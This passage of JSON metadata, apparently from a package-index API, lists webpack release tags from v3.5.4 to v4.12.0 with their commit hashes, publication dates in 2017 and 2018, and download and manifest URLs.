//codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4